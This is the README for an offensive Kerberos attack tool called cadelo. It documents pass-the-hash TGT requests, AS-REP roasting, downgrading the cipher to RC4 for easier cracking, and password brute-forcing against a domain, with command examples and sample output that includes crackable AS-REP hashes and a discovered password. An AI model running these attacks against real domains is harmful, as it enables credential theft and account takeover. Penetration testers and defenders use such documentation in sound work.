cadelo

A tool to interact and attack the Kerberos protocol, based on the library kerbeiros.

Compatible with linux and windows.

Still in development...

To build

git clone https://gitlab.com/Zer1t0/cadelo cd cadelo cargo build --release cd target/release/ ./cadelo -h

## AskTGT

Get a Kerberos TGT

Usage

``` $ ./cadelo asktgt -h cadelo-asktgt Zer1t0 Get a Kerberos TGT

USAGE: cadelo asktgt [OPTIONS] --domain --username <--password |--ntlm |--aes-128 |--aes-256 >

FLAGS: -h, --help Prints help information -V, --version Prints version information

OPTIONS: --aes-128 AES 128 Kerberos key of user --aes-256 AES 256 Kerberos key of user -d, --domain Domain to brute-force -k, --kdc-ip The address of the KDC --ntlm NTLM hash of user --out-file File to save TGT. -p, --password Password of user --ticket-format Format to save retrieved tickets. [default: ccache] [possible values: krb, ccache] -u, --username Username what TGT is for ```

Examples

Requesting a TGT by using the NTLM hash of user password: $ ./cadelo asktgt -d kingdom.hearts -u mickey --ntlm 7ED026C3D202555DB1F8A8BA91C67C27 --kdc-ip 10.0.0.1 [+] Saved TGT into mickey.ccache

## ASREPRoast

Search for users without Kerberos pre-authentication, also enumerates usernames.

How it works

The command asreproast sends Kerberos AS-REQ requests in order to discover users that doesn't require Kerberos pre-authentication, what allows to get the AS-REP response from KDC server, which includes a part encrypted with a key derivated from user password. Then, the tool returns this encrypted part formatted to be cracked in John The Ripper or Hashcat.

Moreover, by default the client indicates to the server that ciphers AES-256, AES-128 and RC4 are allowed, so probably the response comes encrypted with AES-256, which is harder to crack. However, the option --cipher allows specify a cipher algorithm for publish to the server and force the response encrypted with a weaker cipher as RC4.

Finally, this tool also can be use to enumerate users since it retrieves if an user exists or not. In this case, the different with the brute command is that this method don't generates logs of type 4771-Kerberos pre-authentication failed, only logs of 4768-A Kerberos authentication ticket (TGT) was requested.

Generated logs

This tool generates the following log in a Windows Domain Controller: * 4768 - A Kerberos authentication ticket (TGT) was requested

Usage

``` $ ./cadelo asreproast -h cadelo-asreproast AS-REP roast attack

USAGE: cadelo asreproast [FLAGS] [OPTIONS] --domain <--username |--usernames >

FLAGS: -h, --help Prints help information --udp Use of UDP instead of TCP -V, --version Prints version information -v, --verbose Verbose

OPTIONS: --cipher Encryption algorithm requested to server. [possible values: rc4, aes128, aes256] --crack-format Format to save non preauth responses. [default: hashcat] [possible values: hashcat, john] -d, --domain Domain to brute-force -k, --kdc-ip The address of the KDC --out-file File to save discovered non preauth responses. It is in hashcat or john format. -t, --threads Number of threads [default: 1] -u, --username User to check --usernames File with username per line ```

Example

Look for a list of users without Kerberos pre-authentication required: ``` $ ./cadelo asreproast -d kingdom.hearts --usernames users.txt -vv [-] Invalid admin [-] Invalid root [] Valid mickey [-] Invalid bob [] Valid roxas : No Preauth [] To crack roxas $krb5asrep$18$roxas@KINGDOM.HEARTS:4b494e47444f4d2e484541525453726f786173$3fd92aac4926f3d92db9b224ef5e8a41a26cf689f48e65b9894d488a4ab4652811bf19cde7327325db8c0d435798f6ebe6543c19e74b618cf55658b0edfdd4e3f1a6f518468473beae9fb15c73b8b14fe6dd36e42835347d80b5fe8c77f35a6c2f7e35e273946fa85737c892b8cace5932a521011aab536f37cecf3955a6968c4ca9e19fdbcf305f705ca8f5a181fcf495831ab3dadaaaf3ed77b6df27eec1e8cfa6deeb5b4a920817d5c82eceb64bacc0d7cee790c13e2cdc4022cd9f278b29e3636542d1b778dbb34e2f15c09a2b3827da79d3e3ebd327398c1267fe98094aad3a16d79aa2ab1edf9ccfaf4d35d43b3a70b82f2255c01235b296d2097b3387ecde662c3a7e2b33089bbc7726bf03e4a77384801fbb531643d9f6a227ee3d [] Valid xion

== Execution summary ==

[+] 1 users without pre-auth required were discovered, good luck on crack ```

## Brute

Utility to perform a bruteforce attack against the Kerberos protocol. Be careful, since user account can get blocked performing this attack.

How it works

The brute command combines the usernames and passwords provide and test all the possibilities.In this way, it is possible to test an unique password for several users, or many passwords for one user. In case a user password is discovered the generated TGT is also saved for future use (this can be disabled with --no-save-ticket flag). The discovered credentials can be saved in a file using the --output-passwords option.

Furthermore, by processing the Kerberos errors the tool informs if an username exists or not. In the same way, it also indicates if an user account is blocked or disabled.

Finally, in case an user without Kerberos pre-authentication required was discovered, the tool indicates this and returns the encrypted part of the AS-REP message in John the Ripper or Hashcat format to allow its future crack in order to obtain the user password. (It is also possible to save this results into a file by using the --output-non-preauth option).

Generated logs

This tool generates the following logs in a Windows Domain Controller: * 4768 - A Kerberos authentication ticket (TGT) was requested * 4771 - Kerberos pre-authentication failed

Usage

``` $ ./cadelo brute -h cadelo-brute Zer1t0 Bruteforce attack

USAGE: cadelo brute [FLAGS] [OPTIONS] --domain <--password |--passwords > <--username |--usernames >

FLAGS: -h, --help Prints help information --no-save-ticket Do saved the retrieved tickets --udp Use of UDP instead of TCP -V, --version Prints version information -v, --verbose Verbose

OPTIONS: --crack-format Format to save non preauth responses. [default: hashcat] [possible values: hashcat, john] -d, --domain Domain to brute-force -k, --kdc-ip The address of the KDC --output-non-preauth File to save discovered non preauth responses. It is in hashcat or john format. --output-passwords File to save discovered user:password per line -p, --password Password to brute-force --passwords File with password per line -t, --threads Number of threads [default: 1] --ticket-format Format to save retrieved tickets. [default: ccache] [possible values: krb, ccache] -u, --username Username to brute-force --usernames File with username per line ```

Example

Brute-force with a list of usernames and passwords:

``` $ ./cadelo brute -d kingdom.hearts --usernames users.txt --passwords passwords.txt -vvv [-] Invalid admin [-] Invalid root [] Valid mickey [-] Invalid bob [] Valid roxas : No Preauth [*] To crack roxas $krb5asrep$18$roxas@KINGDOM.HEARTS:4b494e47444f4d2e484541525453726f786173$a96e2f5df8eac27e596c5719b9c8c8134ac1aaef136e2bb6f5c814b34924a625af8e1f5ad802e78d0731ab3c099ac79414c7d601a247920ecb614b45405364bf8a1cc2c7c93c8e075241aa1863976ac9b21de4c9170bffc1a438be99a328be42e2cf465a1e2c949ac716e48ddf151f40c3b452b7785287d7adfa2d96a7f8a1a1df4a1b1c6f98c64893f83864026ee3d134ed6781451dda226034d0b9659b21cb4327b3e51f6b714857a988a184783927a1ea518fe90cc4a11956df0c2d3ae946799196fcbb9e88b5cfcaa78ee04c54e1a14dcdde26465a4d5ee7c13cdc2271c9b81c0cb343d65b73bcae7c7e24bb7de9acbd1938811a913fd97a539195d397a78abe63e06c938401d186a4166d54f6a49b3e162551b7e17f31b3db3587fa76 [!] Blocked/Disabled xion [+] STUPENDOUS mickey:Minnie1234 [+] Saved mickey ticket into mickey.ccache

== Execution summary ==

[+] Great, 1 user passwords were discovered [+] 1 users without pre-auth required were discovered, good luck on crack ```